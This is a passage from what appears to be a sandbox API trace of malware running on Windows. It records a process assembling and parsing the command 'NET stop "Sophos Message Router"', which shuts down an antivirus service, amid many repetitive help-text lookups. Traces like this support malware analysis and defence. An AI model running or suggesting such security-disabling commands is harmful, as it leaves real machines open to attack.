(hMem=0x693c18) returned 0x0 [0050.164] GetFileType (hFile=0x26c) returned 0x3 [0050.164] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x693920 [0050.164] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x693920, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ni", lpUsedDefaultChar=0x0) returned 2 [0050.164] WriteFile (in: hFile=0x26c, lpBuffer=0x693920*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff80c, lpOverlapped=0x0 | out: lpBuffer=0x693920*, lpNumberOfBytesWritten=0x2ff80c*=0x2, lpOverlapped=0x0) returned 1 [0050.165] LocalFree (hMem=0x693920) returned 0x0 [0050.165] wcscpy_s (in: _Destination=0x2ff8c4, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="Message", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Message") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Message", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Message ") returned 0x0 [0050.165] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Message ", _SizeInWords=0x200, _Source="RouterΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Message RouterΓÇ¥") returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i댸°/Ѱ°ɬ") returned 0xad [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x2e [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x7d [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x26 [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x19 [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x1b [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xbe [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0050.165] LocalFree (hMem=0x695638) returned 0x0 [0050.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x33 [0050.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x19 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc1 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x16 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x33 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x234 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x13 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x24) returned 14 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x24) returned 14 [0050.166] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x16 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x11 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x12 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xf [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x17 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x18 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x2a [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVE", _MaxCount=0x24) returned 14 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x58 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x184 [0050.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0050.167] LocalFree (hMem=0x695638) returned 0x0 [0050.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc7 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x47 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc2 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x319 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x483 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xa86 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x54 [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message RouterΓÇ¥", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xad [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET ACCOUNTS\r\n[/FORCELOGOF", _MaxCount=0x1a) returned 18 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x2e [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET COMPUTER\r\n\\\\computerna", _MaxCount=0x1a) returned 16 [0050.168] LocalFree (hMem=0x695638) returned 0x0 [0050.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x7d [0050.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET CONFIG SERVER\r\n[/AUTOD", _MaxCount=0x1a) returned 16 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x26 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET CONFIG\r\n[SERVER | WORK", _MaxCount=0x1a) returned 16 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x19 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 16 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x1b [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r", _MaxCount=0x1a) returned 13 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xbe [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET GROUP\r\n[groupname [/CO", _MaxCount=0x1a) returned 12 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x33 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET HELP\r\ncommand\r\n -o", _MaxCount=0x1a) returned 11 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x19 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1a) returned 11 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0xc1 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET LOCALGROUP\r\n[groupname", _MaxCount=0x1a) returned 7 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x16 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 3 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x33 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET SESSION\r\n[\\\\computerna", _MaxCount=0x1a) returned 15 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x234 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1a) returned 12 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x13 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START BROWSER\r\n", _MaxCount=0x1a) returned 14 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1a) returned 14 [0050.169] LocalFree (hMem=0x695638) returned 0x0 [0050.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x14 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START MESSENGER\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x15 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START NET LOGON\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x16 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff80c, nSize=0x0, Arguments=0x2ff808 | out: lpBuffer="嘸i⡋瓢/嘸i/") returned 0x11 [0050.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Message", _String2="NET START RPCSS\r\n", _MaxCount=0x1a) returned 14 [0050.170] LocalFree (hMem=0x695638) returned 0x0 [0050.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc38, dwLanguageId=0x0, 